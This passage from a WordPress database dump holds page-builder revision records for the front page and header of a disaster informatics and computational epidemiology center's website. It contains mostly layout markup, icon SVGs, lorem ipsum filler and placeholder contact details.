aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"population disparities<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 15:41:15','2022-02-16 15:41:15','',168,'https://gsudice.dataconn.net/?p=294',0,'revision','',0),(295,1,'2022-02-16 15:41:15','2022-02-16 15:41:15','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n            <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n                <div\n                  data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c6\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">disease &amp; disaster modeling</h5>\n                  </div>\n              </div>\n              <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n                <!---->\n                <!---->\n                <div class=\"\">\n                  <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n          <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n            <!---->\n            <!---->\n            <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n              <!---->\n              <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n                <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n              <div\n                data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n                <!---->\n                <div class=\"h-heading__outer style-275 style-local-20-c10\">\n                  <!---->\n                  <!---->\n                  <h5 class=\"\">data as a service</h5>\n                </div>\n            </div>\n            <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n        <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n              <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n            <div\n              data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n              <!---->\n              <div class=\"h-heading__outer style-275 style-local-20-c14\">\n                <!---->\n                <!---->\n                <h5 class=\"\">population disparities</h5>\n              </div>\n          </div>\n          <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n            <!---->\n            <!---->\n            <div class=\"\">\n              <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 15:41:15','2022-02-16 15:41:15','',20,'https://gsudice.dataconn.net/?p=295',0,'revision','',0),(296,1,'2022-02-16 15:41:15','2022-02-16 15:41:15','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>&copy; 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics &amp; Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment &amp; Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 15:41:15','2022-02-16 15:41:15','',23,'https://gsudice.dataconn.net/?p=296',0,'revision','',0),(297,1,'2022-02-16 15:41:15','2022-02-16 15:41:15','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n                <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n                <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n                          <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n                                    <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n                                          </a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n                                    <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n                                          <!---->\n                                          <!---->\n                                          <div class=\"\">\n                                            <p>© 2022</p>\n                                          </div>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay 